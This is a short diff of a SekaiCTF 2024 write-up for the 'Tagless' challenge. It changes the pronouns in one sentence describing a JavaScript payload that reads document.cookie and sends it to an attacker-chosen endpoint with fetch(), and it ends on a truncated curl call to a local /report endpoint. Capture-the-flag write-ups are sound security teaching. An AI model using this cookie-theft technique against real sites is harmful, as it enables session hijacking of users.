SekaiCTF 2024 Tagless Writeup

 # ...

-If we want to read out the cookie, we need to craft a JavaScript payload that will read out document.cookie and send it to an endpoint we provide it using fetch().
+If I want to read out the cookie, I need to craft a JavaScript payload that reads out document.cookie and sends it to an endpoint that I provide using fetch().

 curl http://127.0.0.1:5000/report \